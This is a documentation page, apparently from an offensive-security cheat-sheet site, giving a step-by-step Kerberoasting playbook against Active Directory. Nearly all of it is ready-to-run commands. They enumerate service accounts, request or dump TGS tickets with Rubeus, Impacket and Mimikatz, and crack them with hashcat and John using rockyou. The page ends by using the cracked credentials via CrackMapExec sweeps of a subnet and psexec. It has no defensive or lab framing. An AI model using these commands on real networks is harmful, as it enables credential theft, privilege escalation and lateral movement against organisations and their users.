> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Kerberoasting (Local)

> Extract and crack TGS tickets from service accounts for local privilege escalation.

## Overview

Kerberoasting requests TGS tickets for service accounts (accounts with SPNs), then cracks them offline. Any domain user can request TGS tickets — no special privileges needed.

***

## Find Service Accounts (SPNs)

### PowerShell (No Tools)

```powershell theme={"dark"}
setspn -Q */*
```

```powershell theme={"dark"}
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select Name, ServicePrincipalName
```

### PowerView

```powershell theme={"dark"}
Get-DomainUser -SPN | Select samaccountname, serviceprincipalname
```

***

## Request TGS Tickets

### PowerShell (No Tools)

```powershell theme={"dark"}
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db01.target.local:1433"
```

### Rubeus

```cmd theme={"dark"}
Rubeus.exe kerberoast /outfile:hashes.txt
```

Target specific user:

```cmd theme={"dark"}
Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
```

RC4 only (easier to crack):

```cmd theme={"dark"}
Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt
```

### Impacket (Remote from Linux)

```bash theme={"dark"}
impacket-GetUserSPNs target.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt
```

***

## Extract from Memory

### Mimikatz

```
kerberos::list /export
```

Exports `.kirbi` files. Convert to hashcat format:

```bash theme={"dark"}
kirbi2john.py ticket.kirbi > hash.txt
```

***

## Crack TGS Hashes

### Hashcat

```bash theme={"dark"}
# Type 23 — RC4 (krb5tgs$23$)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 17 — AES128
hashcat -m 19600 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 18 — AES256
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt
```

### John

```bash theme={"dark"}
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

***

## Post-Exploitation

Cracked service account password → check privileges:

```bash theme={"dark"}
# Test credentials
crackmapexec smb TARGET -u svc_account -p 'CrackedPassword'

# Check if local admin anywhere
crackmapexec smb SUBNET/24 -u svc_account -p 'CrackedPassword'

# PSExec if admin
impacket-psexec target.local/svc_account:'CrackedPassword'@TARGET
```

***

## Quick Reference

| Tool        | Where            | Notes                 |
| ----------- | ---------------- | --------------------- |
| `setspn`    | Target (Windows) | Built-in, no download |
| Rubeus      | Target (Windows) | Most features, .NET   |
| GetUserSPNs | Attacker (Linux) | Remote, needs creds   |
| Mimikatz    | Target (Windows) | Export from memory    |
